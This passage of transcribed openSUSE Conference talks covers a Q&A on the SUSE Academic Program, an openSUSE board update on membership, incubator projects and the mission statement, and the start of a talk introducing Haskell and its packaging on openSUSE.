CompTIA as well. Is this going to be the case in the future? Again, a very good question; we've been talking about this before. Between LPI, CompTIA and SUSE there was a cooperation regarding certification: if you did the CompTIA certification, you would get the SUSE Linux administrator level and the LPI level one alongside it. From SUSE we had to stop that project, because we had people certifying for SUSE technology while they had never, ever touched a SUSE machine. That was a challenge we had to deal with, so we had to figure something out, and we actually came up with a solution. If I can easily get the picture back with the certification levels: we've got the certification at different levels, and what we did is, if you think that because of your CompTIA or LPI certification you qualify for the higher level, so the engineer-level certification, you can go straight to that exam and skip the lower-level exam, and if you pass the higher-level exam, you will also get the lower-level one retroactively.
That means we have made sure that everybody who has a SUSE certification knows the technology, but you still have the biggest advantage of that old model: if you are LPI or CompTIA certified in Linux technology in general, and you prove to us that you also know SUSE technology by passing the higher exam, you don't have to do two exams. Only one exam, and you're done, and you're certified at the highest level. Okay, thank you. Is it clear? Yeah. Okay. Thanks. Another question: the Linux Foundation also has certifications by now. How does SUSE's academic program relate to that? It's the same; so it's the same as with LPI and CompTIA. There are a few minor differences, but it's about the same idea. So if you prove to be certified in Linux technology at the entry level, you can go into the higher level of SUSE certification, and once you pass, you get the other one afterwards. So it works the same. Great questions, actually. Really good. So, next question. Yes: what was the decision to actually rule out private universities and anything for-profit, or did you come up with a model for them? Are you talking about coming up with a model for private universities, or even charter schools? In that case they're sort of private, they make money. You know, it seems like the program, while good, is ruling out a certain area I think we would want to address; perhaps something in between the commercial and the non-profit school. Yeah, you're perfectly right. It is a gray area. In the Netherlands we've got companies who are sort of training students but who have a commercial goal. There are clear guidelines and we will keep those guidelines; we'll look at them and judge whether or not it's competing. For some countries I will look into whether it's competing with my commercial institutions, and if my commercial training partners don't mind that a specific commercial academy becomes part of the academic program, then I'm fine with it as well. The main goal of SUSE is to train as many people as possible in SUSE technology, to color as many people as possible green, but we can only do that if the commercial training partners have a good business case. If we destroy the business case of the commercial training partners, we will have no commercial institutions bringing our training to the market. So that's basically the challenge that we're dealing with, but the gray area: I'm willing to look at the gray area and see if we can come up with a solution; they either have to fit into the commercial model or into the academic model. So please start the discussion and we will find some way to get as many people as possible colored green. Any other questions here in the front? Thanks. How do you plan to advertise the program? Do you plan to go directly to universities and advertise it, or go to university fairs, or what is the plan? Wow, these questions are really good. This is more about the marketing. We decided to create an academic program because there was a demand; there was a demand from academic institutions: come up with a program. So that's what we did. And the focus of SUSE is on helping customers, selling subscriptions, getting happy customers. What we've done is create a program, and our goal, and maybe our hope, is that the program will fully sustain itself. So everything should be available, and there are people picking up the phone if you have specific questions.
So we've got two people, one for EMEA and one for the rest of the world, who pick up the phone if you have a question about the academic program. We're trying to keep the effort that low, so to say, so that we don't have to invest too much time in running it. But on the other hand, I was allowed by SUSE to come up here, to come to Nuremberg, and to present the academic program. I presented it two weeks ago in the Netherlands, and I will do it a couple more times at different places. So that is the marketing, but we really hope that it will sort of take off by itself, because we think we've created a program with such low barriers for an academic institute: why would you not enter this program? If you compare it to commercial vendors who have academic programs, then quite often you have to pay a certain amount or there are all kinds of hurdles you have to get over. Well, this program: that's how we hope it will work. If it doesn't work like this, so if not enough people know about the academic program after some time, we will evaluate it and we will start a marketing campaign. Is that a satisfactory answer? Somehow, somehow. Yeah, you think... yeah. Yes and no. Well, if it works out like this, we will see, but if it doesn't work out, we will pick it up and bring it to a higher marketing level. But maybe, if the openSUSE community likes it a lot and you all here in this room like the idea, what we all can do is bring it to social media and shout it out: tell everybody you know that there is a very easy-to-subscribe-to academic program, and let word of mouth, as it's called, do its work. Any other questions? No? Oh, that's excellent. Well, thank you very much, and I really want to thank you specifically for those questions at the end, because they were really, really great questions. And again, remember: this is the website, that's the marketing we do for now, and if you have any questions about the academic program, feel free to approach me at any time. Thank you very much. Have a great day. Thank you.
The new SUSE Academic Program explained! As a leading open source company, SUSE supports schools, higher learning institutions and the academic community in getting free access to our extensive experience and knowledge. Many IT students still get trained in software stacks that are not the highest in demand on the labor market. In many cases IT infrastructure classes are still dominated by proprietary software, but the dominating IT infrastructure "in real life" nowadays is open source technology. As SUSE delivers enterprise open source technology, many schools have asked SUSE to come up with an academic program. Now we are able to explain to you most bits and bytes of how we believe we can color schools and students green!
10.5446/54491 (DOI)
All right, then. Okay. So with the board, this is the last thing, the final stretch. Everybody had a good time? Yeah. Awesome. So we did something a little bit different this year. Normally, every year after the board gets elected, we have a big annual meeting where SUSE hosts us and we visit SUSE and basically spend several days locked in meeting rooms discussing what the project needs to have done, what we need to sort out, et cetera. And we normally do this around Easter time. But as you will remember, we had a few problems with our election tooling this year, so we didn't actually get the election finished until later on. So we had that meeting in the last three days before the openSUSE Conference, which is why we all look so tired, because we've been here for six days. But it means that we've got this chance to give you an update on what we've been thinking about and the agenda that we want to set for the next year in the project. And the short and simple summary, because I don't want to take too much time (it's the last day, the last session, the last bit of the conference): we've been busy. We've been really busy. In fact, when we started this meeting, we'd been thinking along the lines of: the project's been through a whole lot of change in the last few years. We've done Leap, we've completely revamped Tumbleweed; there's been huge technical change in the project. And the plan was: we're going to take it easy this year. The plan was useless. It's not going according to plan, but it's way more exciting as a result. But that's where we started. So we were thinking about tidying up what needs tidying up in the project. There is a fair bit of organizational cruft lurking around in the project: things like wiki articles, policies, procedures, old corporate statements from the Novell days, feature requests, et cetera. We've started tidying that up over the last few days. So if you get a whole pile of emails from FATE, that's us; we've been closing FATE entries which have already been done in the distribution, and we've been closing feature requests that are just never going to get done, or that we think are never going to get done. If we're wrong, reopen them, find someone to do them. We are going through the wiki and tidying up various parts there. This isn't a job just for us, the board. If there are things that you see and you think: why is that there, why has no one fixed that? Dive in, help, tidy up. We're trying to clean out all of that cruft that's just been left lingering around for the last few years. We've made a start. As a FATE example, we actually managed to break openFATE while doing all this tidying up, by making too many changes at once. That's getting fixed now. Moving along. That's going to be an ongoing thing for the year, and we really want to help anybody who's working on that. If you have any questions, if you think anything needs the board to review, just mail board@opensuse.org and we'll help you tidy it up. While thinking about that (and actually this point came from Martin as well): 42.2 is now live, 42.3 is in development, and 42.1 went end of life a week or two ago. We've noticed already, and we've seen from the mailing lists and from our users, that not enough users really followed the release cycle that we had planned for Leap. There's a lot of people still lurking around on 42.1; they didn't move to 42.2 in the six months that they had.
It's kind of obvious why: we kept the old terminology from the old openSUSE way of doing things, where we used to have every single version be a major version, which meant there was going to be some risk of change when you moved. That doesn't really make sense for Leap. Every single minor release is a minor release; it's based on a SLE service pack. The question was asked, and we've decided that with Leap 15 coming next year, don't be surprised when, on the messaging side of things, we start using terms like service pack or maintenance pack to refer to those minor releases. We're going to be making sure that release announcements and marketing announcements make it much, much clearer what that release cycle is. The end-of-life period for a previous service pack starts the second the new service pack is released; it's six months from that point. We want to help get that message out. Please help us; please remind people that a minor release is really just a service pack. Another thing we were looking at, and anybody who's been in the project for more than a year knows we've been looking at this, is an issue with the membership program. So obviously, to elect the board, you need to be an openSUSE member, and currently, to be an openSUSE member, you have to, a bit like Ubuntu or GNOME, have been a contributor for a while and have sustained and substantial contributions, which is a real pain in the ass to actually figure out whether that's true or not. We have a long, complicated process of applying and waiting, the tool breaks and accidentally loses certain requests, and ultimately, most of the time, we're just guessing whether the person really has contributed or not. And also, over time, even though that does eventually work and they do eventually become members, it means that it's also very hard to un-become a member. We have loads and loads of members on our list who don't do anything in the community anymore. We're 12 years old; they've left, they've moved on, fine. It means, actually, that, well, these guys (not me, it's different with me), these guys are basically uncontrollable dictators at this point, because they're all elected by the community, by the membership. The rule in the original policies is that 25% of the members can cause a recall election of the board. Well, right now we can't contact 25% of the membership on the list. So they have complete power. SUSE can fire me, but the membership can't really get rid of them. We, the board, all of us, don't like that situation. We want to be more accountable to the membership, to the community at large. So how do we fix that? We're going to be changing the situation: a single contribution to openSUSE is enough to be eligible to become a member. You still have to apply for it and want to be a member; I'm not just going to randomly hand out membership to anybody who's done anything once. But if you have one measurable contribution, be that an actual bit of code or a mailing list post or whatever, it's enough to become a member. The exact details of the tooling for automatic approval or confirmation are a work in progress. The Connect tool we have, we want to decommission. We do have a few scripts that are helping us with that process, but if you're interested in helping us with this, Mirhal is currently doing most of the work and he could do with people helping him. We will already be using a tool to automatically renew membership.
So if you are contributing at least once a year, this will never affect you. You're a member; done, fine, no problem. If for whatever reason you drop off the radar from the tool's perspective (changing your email address, for example, will probably cause that), then once a year this tool will ping you and say: hey, do you still want to be a member? The principle that we want to keep throughout all of this is that an openSUSE member remains a member as long as they want to be one. So that ping isn't an attempt to get rid of you. It's just making sure: are you still there, are you still interested? If you are, cool, fine, good, done. Still a member, at least for another year, and then the bot might be stupid and ask you again. We'll see. But we need help with all of that tooling. We need help with that, especially as we did a test run of the tool while we were here and accidentally deleted 90 people that we didn't mean to. So, incredibly sorry about that. Please just email us and we'll put your membership back. Yeah. Beta testing is always fun. Sorry. Anyway, that covers the membership side of things. Another thing that was on the agenda for the meeting was handling the rough edges of the project. Everybody should know, from me ranting last year on this stage, that this is an area that's incredibly close to my heart: what do we do about the unsupported parts of openSUSE? What do we do about people using devel projects, or the unofficial spins Krypton and Argon, or new initiatives like Kubic, which was presented here? These things are something people want to use. They're going to use them, they're exciting things, but they're not at that level of quality at which we, the openSUSE community, normally do things. They're not being tested by openQA, they're not built to the standard policies we use in Tumbleweed or Leap or anything like that. And how do we handle that? Well, when we started this, we were talking about how do we handle the rough edges: do we kill or drop these, or whatever? But as we were discussing this week, we realized that that isn't actually the question that needs to be answered. The question is: how do you handle people's expectations of these bits of the project, so that when they use them, they dive in knowing that this is still openSUSE, but it might not be finished yet, or might not be at totally the same level as the main deliverables that the openSUSE project provides. So, like you can see there, openSUSE Incubators is a program we're starting, basically ripping off the idea entirely from Apache; Apache solved this problem their own way. The way we see it, it's sort of an official stamp of both intent and quality. Any openSUSE Incubator project is an openSUSE project, and it's something we're actively working on. But from a quality perspective, it's an openSUSE project that isn't quite yet of that quality, although it's aspiring to be there; it's going to be there sooner or later. The sort of things that we're thinking of, like I said, are things like Krypton and Argon, where the communities there are working on testing, working on improving these things, trying to get there. It's a perfect example of the sort of thing which we think would make a good openSUSE Incubator project. We want this kind of badge to be relatively easy to get; a casual application to the board is the way we're thinking of managing it, at least to start with. And we're going to ask a few simple questions like: is it more than one contributor? Do you have one or two people doing it?
Have you thought about testing this? Have you thought about that? But there aren't going to be any hard definitions, because these projects might not be something that's easy to compare to what we're already doing. This might not be another distribution; it could be something like a Spacewalk build for openSUSE, which wouldn't fit that same concept. So how do we handle that? We're not going to make long, complicated policies; that's not our way of doing things. We'll have this simple process: you apply, we think about it, talk it out, you're an incubator. And then we'll make it a little bit harder, just like it already is, to have that become a fully official openSUSE project, where there'll be some, probably still subjective, criteria, making sure that we're using the openSUSE name on something that is polished, tested, and done the proper way, just like we do everything else. And again, with all this stuff, we need help. We need to know which projects would make sense to become these first incubators. We need help tidying up these processes and criteria. And of course, this could potentially have a big impact on things like the tooling. We were thinking about devel projects in particular: there are a lot of devel projects which exist purely as a playground for messing around to get stuff into Tumbleweed. You don't want users touching them ever, and if they do, things are going to break. But there are other devel projects, like GNOME Next and the KDE unstable ones, which are built with users in mind, for potentially testing and playing around with the latest version of the various stacks. And they're tested and they're looked after and they're moderated properly. They're still devel projects for Factory, but they could also be incubation projects too. If that happens, we're going to want to reflect that in tools like software.opensuse.org, so they're treated as a different tier, not just as unofficial, do-not-touch, be-scared, unsupported nonsense. So we'll need help reflecting that in the tooling and the websites, et cetera. We haven't put anything on the openSUSE project mailing list yet, but we will; or if someone wants to start the discussion straight after this, start it on the mailing list and we'll talk about it. Job done. Nearly there. Next: next year's openSUSE Conference. We've been thinking about that. I hope, as we've already asked, everybody had a good time. We love coming here; it's been as much fun this year as it was last. But we're thinking of doing something slightly different next year, mainly the idea of co-locating with a different event. And obviously we're close to Prague, there are lots of contributors we have in Prague, there's another SUSE office in Prague, which makes it easy for the budgeting side of things. So we're thinking of taking openSUSE Conference 2018 to Prague, to the university they have there, co-locating with the CryptoFest, which conveniently happens about the same time, this time next year. Nothing's absolutely certain yet. If it doesn't work out, plan B is to come back here and do another openSUSE Conference in Nürnberg. And even if this happens, the board's thinking of having a model of one year having the conference in Prague, trying to co-locate with something there, and every other year coming back here, having openSUSE Conference here, because it works. We love it, it's been great. And then, last but not least, mission statements. We had a long, long discussion about the openSUSE mission statement.
First, because we were thinking of tidying stuff up: like, why do we even have one? Other projects don't; Fedora do, but Debian don't and GNOME don't have one. But we decided that we think it matters. It sets the tone of the project, or more accurately reflects the tone of the project, and it's the first thing that everybody quotes when they say what openSUSE is. You can just look at it, especially in the last few years where we've been getting a lot more media attention: the openSUSE mission statement gets cited in every single mention of us, in conference web pages, in news articles, all the time. It's the first thing a newcomer is likely to read. And our mission statement currently reads: openSUSE is a worldwide effort that promotes the use of Linux everywhere. And it was; that's what we started doing 12 years ago. Then we started looking at: okay, what do we actually do in openSUSE? And I mean, this is just a tiny example; these are all the openSUSE subprojects. You've got testing tools, you've got a huge collection of different things, which are all openSUSE in their own way, and they're not necessarily Linux. So should the mission statement have been something like this: a worldwide project that promotes the use of Linux and build tools and testing tools and system tools and software delivery tools and collaboration tools everywhere? No. While we were talking this out, we kind of realized that both, especially this one, but even the original one, miss the whole point of what's actually special about openSUSE. Because it's not just about what we're doing, but how we're actually doing it. And some of the things that really set openSUSE apart from everything else are the fact that, as a community, we really care about working openly: having not just open source, but open discussions, different ideas. Our entire development project model is built around the idea that we're going to have different teams working in different ways, so let's find a way of cramming that all into Factory. It's just the way we think: having open processes in everything. But even though we do everything openly, we worry about doing things right in the first place. Half of those tools exist because we care about engineering things properly. We care about doing it the right way, we care about building it reproducibly in the Build Service, we care about testing that stuff properly. And our current mission statement just kind of ignores all of that and doesn't even mention it. And we also really embrace the traditional open source way of scratching your own itch. Nobody sets the agenda for openSUSE more than the community does when they're doing it. You know, we are open; you set it, well, we set it, there's no difference. There's one consistent mess of everybody doing whatever they want to do. And how do you really reflect that when we're trying to set a mission statement of what the community does? So, I mean, this isn't final. Basically, I'm going to have to write all of this up and explain it way better, because I haven't had the time while I've been at the conference. But we're going to be talking on the mailing list about this new draft redefining the mission statement as: openSUSE, openly engineered tools to change your world. You know, basically really focusing on all those main aspects: we do everything in the open; how we engineer stuff really, really matters; and the use case, the why, what we're doing it for, is whatever our community wants to do it for. It's your itch.
It's the things you want to change. And of course, ultimately everything we're building is a tool in some form, be it the Build Service or openQA, which obviously are tools, but the distributions themselves too. Ultimately, they're useless if they're not doing something; they're tools. And that is the last thing I have on these slides. So, with that, does anybody have any questions about this, or anything else in the project? Or does everybody just want to go and have beer? Just on the mission statement, I would say when we talk about community, it's a community of humans and not a community of tools, so perhaps we have to find a way to put the word human somewhere inside the sentence. Well, the human part is the "your"; we're not making this for robotic AIs yet. But it's a fair point. We did discuss that. We actually went round and round in circles and tried to figure out how to put a human message in there, but we thought the "your world" part did that. But it's a fair point. When we put this on the project mailing list, I fully expect a really long mailing list thread to read. Don't be surprised about it. This is just a draft, it says draft, but this is what we were thinking about. Cool. Okay, then. Yeah, Christian, go on. Tools and processes, perhaps, because I think it's equally important to make an open tool in an open way. I think you have that in "openly", but processes is a bigger word that would wrap up many of those concepts. I can barely hear the words you're saying because of the speaker. Sorry. Anyway, just wanted to say maybe processes as well as tools, because I think this is equally important. Processes instead of tools? Yeah. Yeah, totally. I mean, the "openly" part was kind of meant to imply that. Yeah, I like the new statement. I'm just surprised, because I thought we just changed it two years ago to "the makers' choice". Nobody mentioned that. That was a marketing tagline; it wasn't our mission statement. Okay. Yeah. I think all of this stuff that we've explained here, or I explained here: in our mission statement, we have paragraphs explaining what we mean behind that, and that's what the whole mission statement will do in full. That's just the short, simple part. Hi, Mark. I just want to say I like your mission statement. Usually, when people get together to write a mission statement, you take the number of people on the committee multiplied by eight, and that's how many words are in your mission statement. So I think you guys have done a really good job trying to keep it minimal. That is totally Thomas's; he deserves all the praise for that, because our original version was like that long. It was terrible. And then he got the clipboard out and said: start voting on these words, and we're going to kill them. And we got down to this. Thanks, thanks to Thomas. I just want to bring up a topic that we're working on with Linux Magazine. We're going to try to get a magazine out called Getting Started with Linux. They were going to work on that for 42.3, and we need some articles. So if any of you are interested in writing something specific about 42.3 for a magazine, contact me. Cool. Great. Thank you. Okay, then. Thanks a lot for a great conference. And yeah, see you all next year, hopefully in Prague. Oh, sorry. What do you want? Just a quick check: who is aware of the TSP? Just want to make sure. Okay. Maybe I should rephrase the question.
Who's not aware of what the TSP is? Perfect. You can explain that. Right. So openSUSE has what's known as the Travel Support Program, hence the TSP, because we're in technology, so we like acronyms. The aim of the TSP is to enable community members to represent the project at other events, at venues, et cetera. So if you would like to attend a conference or some other event, but it's not exactly pocket change, so it's not just 10 euros to get on the train or whatever, you can submit a request to the TSP. The current and foreseeable deal is that the TSP will pay up to 80% of your travel and accommodation. We do check to make sure that you couldn't potentially get cheaper flights, but it's fairly easy to apply. So just make sure that you do submit a request: currently it's through Connect, but that's not a major issue, it'll just be moved to a different tool at some point. If you go via the wiki, if you just search for openSUSE TSP or openSUSE travel support, you'll easily find it. Hopefully we can have an easier URL to remember. But I just want to make sure that if you are interested in representing openSUSE in whatever shape or form and you'd like help to do that, please do submit a request. If we've got any questions, we'll get straight back to you. The TSP will just confirm with the board to make sure that everyone's happy. With that, chances are... actually, I don't know of any reason in the past that the board have complained. I know one. Putting my other hat on for a second as the chairman appointed by SUSE: the protocol for SUSE employees who happen to be contributing, and there's a few of you in the room, is subtly different. The TSP is there to help, but SUSE wants to make sure that SUSE is paying for SUSE first, before making the community pay for anything. So the TSP is only available for SUSE employees who also contribute to openSUSE once your manager has already said no, and as long as you're actively contributing to the event in question, like doing a talk about openSUSE there. It's still there for you, but really try to get your manager to pay for it first; SUSE should be paying that. That's all. Does anybody have anything else they want to talk about? Any questions, you guys? Any complaints? No? If that was true, the project mailing list would be so much quieter. All right then. Thank you very much.
Like every year, the last session will be a meeting with the openSUSE Board.
10.5446/54493 (DOI)
Okay, I suppose I'll just begin; if some people are late, they won't miss that much in the beginning. Okay. Is everything all right? Okay. I'd like to talk for a bit about the state of the Haskell infrastructure in the openSUSE family of distributions. I have split the talk a bit into two parts. The first part is basically supposed to introduce people who know about openSUSE but who have no idea about Haskell: I'd like to show a bit of the language Haskell, why it might be worthwhile to look into it, and why openSUSE distributions are a good place to do that. The second part of the talk is then geared towards people who may be developing in Haskell but who don't know that much about openSUSE and who would like to know: how do I set up my development environment, how do I deploy my programs? And last but not least, I'd like to share a couple of experiences and insights into what it feels like to manage a package set of about 2,200 packages these days; as I learned today, except for about 100 of those which are still in the submission queue, everything else is actually available in Factory these days. So there was quite an interesting effort to get that done. So, Haskell: I suppose everybody who's here has at least heard the name. The language has a couple of very nice properties that I enjoy very much, and since for most of my life I was a C++ programmer, what I like about Haskell very much is the concise syntax. It's very much inspired by the notation of mathematics, and mathematical notation is arguably very successful: it's been developed for 2,000 years or longer and it's extremely expressive and short. And it's the same in Haskell. If you program in Haskell, your source code is crisp and clean and you can read it easily. If you write a generic function in C++, then you have all kinds of boilerplate: you have to inherit iterator traits, you have to have all kinds of template keywords, you have to have a structure around it, define operators and whatnot, and you have 80 lines of code for like one line of payload. In Haskell, this is very different. So this is real source code, and when you define a function that's supposed to square some value, then this is all you write. There is no boilerplate at all. You'll find that this is fairly similar to Python: in Python you could write an almost identical definition of square, you'd just have a couple of extra brackets and a def keyword at the beginning. But the difference is that this is actually a statically typed language. So all these functions and all these constants have a very precise, very accurate type that is verified at compile time, and you cannot use them in an unsafe way. On the next slide, we'll see what's going on. So the square function is fairly obvious. Then you have a nice feature that this modulo function, mod, is a normal function: it takes two arguments and returns a result. And what you can do in Haskell is, if you put the function name in these backticks, then you can write it between your operands. So you could write mod x 2 == 0, or you can write it this way and use it like an operator, which is sometimes more expressive. You have list comprehensions. So if you see the definition of this list of integer values there, all three definitions are equivalent. You have the list comprehension syntax, which everyone who is familiar with math will recognize.
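The slides themselves are not reproduced in this transcript, but the definitions being read out could look roughly like the following sketch; the exact names used on the original slides are assumptions:

```haskell
-- squaring works for any numeric type; no boilerplate required
square :: Num a => a -> a
square x = x * x

-- `mod` in backticks can be used like an infix operator
isEven :: Integer -> Bool
isEven x = x `mod` 2 == 0

-- three equivalent definitions of the (infinite) list of even numbers
evens1, evens2, evens3 :: [Integer]
evens1 = [ x | x <- [0..], x `mod` 2 == 0 ]  -- list comprehension
evens2 = filter even [0..]                   -- higher-order function
evens3 = [0, 2 ..]                           -- arithmetic sequence
```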
You have the second line uses a higher order function. So you have filter is a standard function, which iterates over all elements of that list, which is given as the third argument and applies this attribute to each of them. And whenever this even returns true, the result is kept in the list. And if this even returns false, the result is dropped from the list. And so you can create the list of even numbers, which is ultimately the same thing as that third line. And you could write it just like that in Haskell and would get the same result. And what is also kind of nice about this, this is an infinite list. So this list has no end. And it contains all the numbers. You can think of it like a generator in Python, right? It's not actually a list, but it's know-how that tells you how to generate that list if you consume it. Then for the last example is the odd numbers. There is also, here is a feature that's particularly nice that's occurring. So what this does is the plus operator is a function that takes two arguments. And when I provide one argument already, then this turns into a function that takes one argument and gives a result, right? So one argument has been bound already. And you know the same thing from C++ maybe, but in C++ you have an explicit bind function to do this. In Haskell you can just write the argument there and transform the function into one that has one argument less. And then you end up with something you can map over this list of even numbers to get at the result you get there. So all this code tends to be extremely short and expressive even though it encodes fairly sophisticated concepts. The Haskell type system is very nice. It's a statically typed language. It has very strong typing. So unlike in C for instance, if you have a function that expects and signed integer and you pass it an unsigned integer, then this is a compiler error. You can't do that. You have to explicitly convert these different types and catch the overflows or underflows if you want to. But the thing is you can't, types are very strictly enforced. And when we look at this square function from the last slide, it has a very accurate type, right? Some type A and returns some other type A. So the information is we don't know what type it is, but it takes, returns the same type as it gets. And there is one constraint on that type. You can't just pass it anything, but you can pass it only things that are instances of the class num. And the class num, this is the definition or a short abbreviated definition, has the distinguishing feature that it defines this operator. So makes perfect sense intuitively, right? So if you use this operator here, then you can use this function only on things for which this operator is defined. Again, this is something that you would be able to do in Python as well, right? If you have a Python function square like this and you pass it something that has a multiplication operator, then it works, right? But the difference here is that if I define a new type, foo for instance, and then we define the multiplication operator for this. And this is perfectly legitimate code, right? You can multiply foo in this way. But you cannot pass foo to square because this multiplication here is not the same multiplication as this one. So the only way you'll be able to pass foo into the square function is if you define foo to be an instance of num. So you explicitly say, I fulfill this interface. And if this data type fulfills this interface, then you can use it. 
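A sketch of the currying and type-class points just made; the Foo type and its Num instance are illustrative and not taken from the talk's slides:

```haskell
square :: Num a => a -> a
square x = x * x

evens, odds :: [Integer]
evens = filter even [0 ..]   -- keep only the elements for which `even` is True
odds  = map (+ 1) evens      -- (+ 1) is (+) partially applied to one argument

-- a new type with its own multiplication is not automatically a Num ...
newtype Foo = Foo Integer deriving Show

-- ... until we declare the instance explicitly:
instance Num Foo where
  Foo a * Foo b  = Foo (a * b)
  Foo a + Foo b  = Foo (a + b)
  negate (Foo a) = Foo (negate a)
  abs (Foo a)    = Foo (abs a)
  signum (Foo a) = Foo (signum a)
  fromInteger    = Foo

-- only now does this type-check:
fooSquared :: Foo
fooSquared = square (Foo 3)   -- Foo 9
```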
And so all the fundamental concepts of different kinds of numbers, integrals, floating point numbers are abstracted in type classes in Haskell. And all the code that you write always works for all instances of that class. So when you write mathematical function, then you can use them with a double or you can use them with a multi-precision GMP whatnot object which takes lots and lots of memory. This is you don't care, right? This is the same thing for you. Another very nice feature is the ability to define polymorphic algebraic data types. So for instance, an optional value is typically encoded in a maybe. This data type has two ways to construct it. You can construct it with a just, anti-actual value, or you can construct it saying nothing. And then this is a type you can pass to a function. For instance, this function is going to greet someone and you pass the name of the person and it's supposed to greet. And if you pass it with just world, it's going to say hello world. And if you pass nothing, then it's going to say hello stranger as a default. And so this is a very concise way to express an optional value and you unresolve this ambiguity through pattern matching. So you just write multiple cases of your function and the one that matches is going to be the one that's chosen. And then there is another feature which is arguably the most mind-boggling one and that's referential transparency or it's called a lazy evaluation. It's the common name. And what that means is that, no, not lazy evaluation, excuse me, it's a pure functional, purely functional. What that means is that the result of a function depends only on its arguments. So basically Haskell guarantees that if you call a function with one argument and you get some result, then every time you call that function with that argument, you will get the same result. And this means that the compiler can optimize all common expressions anywhere in your source code that take the same arguments away and compute them once and replace the result everywhere. For instance, this function which computes the length of a list, if you call it 10 times with the same list, you will get 10 times the same result. So now contrast that to the function string length that you know from C, for instance. If you pass string length a pointer, then this is the argument to your function. And now string length is going to iterate over the memory until it finds a zero byte and it's going to return the number of bytes it could iterate until then. So now if you change the underlying memory and call the function again with the same pointer, you'll get a different result because the memory has changed. So there is a hidden state somewhere, the memory in the machine, which is not visible in this type because the pointer you pass is both times the same pointer. And consequently, this is a function you cannot write in pure Haskell. So this function cannot exist, right, because it violates the guarantee of referential transparency. And the reference to transparency is nice for the compiler because it allows for great opportunities for optimization. But where it's really beneficial is for software engineers because what it means is that functions have no hidden state. If you have a function, that is a pure mathematical function. It takes five arguments and then all it does is work with those five arguments. There's no other global variable. There is no hidden state somewhere in a class method. It doesn't exist. 
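The optional-value example described above might look roughly like this (a sketch, not the original slide):

```haskell
-- the optional-value example: resolve the two cases by pattern matching
greet :: Maybe String -> String
greet (Just name) = "Hello, " ++ name ++ "!"
greet Nothing     = "Hello, stranger!"

-- greet's result depends only on its argument: there is no hidden state anywhere
main :: IO ()
main = do
  putStrLn (greet (Just "world"))
  putStrLn (greet Nothing)
```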
It's just the arguments that you pass and those determine what the function does. So if you read Haskell code, then you can read one function as a time and you always have a complete algorithm that does something with the arguments it takes. Of course, you can go through all kinds of contortions to make the code unreadable anyway, right, but most of the time it's actually fairly difficult. And then this is another crazy scheme and this is lazy evaluation, which I was referring to before. So a Haskell program is evaluated from the end. So the compiler looks at what is the program going to return when it terminates? What's the end result? And then it goes backwards through the source code and finds all the expressions it needs to compute that result and everything that it doesn't need, it doesn't compute. So for instance, this is a list of integer and every single element of that list is going to throw an exception. So this list, this for instance, is going to throw an arithmetic error. This is going to throw an undefined exception. This is going to throw a violated assertion. Here we have a Boolean which says this list has three items or we throw an exception. So now the question is what happens when you evaluate that, when you ask the compiler, give me the value of B and the answer is you don't know. And this is actually for surprising reasons. So the compiler is completely at liberty to evaluate this part and if it does, it throws an exception or it can evaluate this part and in this case it's going to return true. The reason is when you look at the definition of length, the function that computes the list, right, it does pattern matching on the list, it says give me the first element, give me the rest of the list and then it does the recursion. But this value is never actually required as far as the function is concerned. This is just an entry in the list and I don't care what the entry actually is. This is not evaluated. So when you compute the length of that list, this is going to come out as three. There is no exception because none of those items is ever evaluated. You don't need to evaluate them to compute the length of the list. And so this Boolean is either true or it's user error fail and you don't know which one. So lazy evaluation has some mind-boggling consequences, it's sometimes very, very difficult to predict what's going to happen when you have complex code that has these properties. But the thing is that lazy evaluation helps combat a very dangerous thing called premature optimization because when you know that things that I don't need are not going to be evaluated and they don't cost me anything, it doesn't mean that you, it means you don't have to optimize them. If you think of an parser that parses an XML document, for instance, the XML document has like a thousand fields. So now you can devise a data type that contains all those thousand fields and it very nicely parses them and it turns the strings into numbers where it's a number and where it's an email address, it parses the email address and it gives you a very nice, very structured, sophisticated representation of the XML file. Now somebody who is processing that XML file uses your library and says, yeah, I just want, I don't know, the first element, I don't want the rest. It means that your parser is not going to pass any of the rest, it just parses the first element, says yes, your result and that's that. 
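A minimal sketch of the lazy-evaluation example discussed above; the exact expressions on the slide may have differed:

```haskell
-- every element of this list would fail if it were ever evaluated ...
bombs :: [Integer]
bombs = [ 1 `div` 0                    -- arithmetic error
        , undefined                    -- "Prelude.undefined"
        , error "violated assertion"   -- custom error
        ]

-- ... but length never looks at the elements, only at the list structure
main :: IO ()
main = print (length bombs)   -- prints 3
```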
So you can define, you don't have to, this notion that you have to abort the computation at some point, you don't have to care about that. The runtime system does that for you. There is a lot more. There is, Haskell is, as far as I know, the most popular language in language research and compiler research and type system research and there is a lot of work going on. You have an interactive development environment which people who program Python know that you have this interactive shell in which you can call any function until you get the result and this works particularly well in a purely functional language because if you have a function that depends only on its arguments, that means you can call it in any context, right? There is no hidden state. So you don't have to set up some elaborate environment to call your function, you just pass it the arguments and then it works. So this is actually very nice for development. The type system in Haskell compilers is crazy. There is, they are working, the thing people are working on these days is dependent types and linear types and this is all very interesting research stuff that's being prototyped essentially in that language. You have another thing which I personally love is asynchronous exceptions. In Haskell, you can have any number of threads that are computing in parallel. You can have thousands of threads, doesn't matter. It's quite common to do that. And now one thread can throw an exception to another thread. And that exception is going to arise at whatever point that other thread is currently evaluating. So this means when you look at your source code and you're thinking what exception can happen now, the answer is everything. Every exception can happen. At every point of your source code, everything can fail with every error because another thread might throw you that thing and then you get it and it's your exception. And this is also something that boggles your mind in the beginning because there is no such thing as code that can't fail. But it's actually a very accurate representation of what computers are because when you assume this can't fail, you're probably wrong. And Haskell guarantees you, yeah, you are wrong. This can fail and this can fail with any error. You have to deal with everything at any point. There is software transactional memory. It's probably hard to explain, it's a way to write transactions without locking, which is very nice because it allows you to write composable software. There is the support for parallel computation is excellent. So when you write code in Haskell and you have a thousand threads all evaluating in parallel, that's perfectly normal. That's very efficient. You can use the Rheem solvers to prove properties of your code and last but not least, if you want to, you can cross compile the entire thing to JavaScript and run it in a web browser. It's very nice. So now you're thinking, man, this Haskell doesn't sound so bad. I want to try it. And on open source, that's actually very simple. So first of all, you need the basic development environment and this is the compiler, GHC. And this, the compiler and cabal install is the build driver which you use to build your package to do your interactive development. This is typically something you'll want. This is a part of, in Tumbleweed, you have the latest version of everything all the time. We update that basically once a week. In Leap, you're going to have in Leap 42.3, you're also going to have the latest version of everything. 
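The setup just described boils down to something like the following. The package names match openSUSE conventions; the repository URL in the second step is an assumption based on the usual OBS download layout, so check build.opensuse.org for the actual devel:languages:haskell projects before using it:

```
# basic Haskell development environment (run as root or via sudo)
zypper install ghc cabal-install

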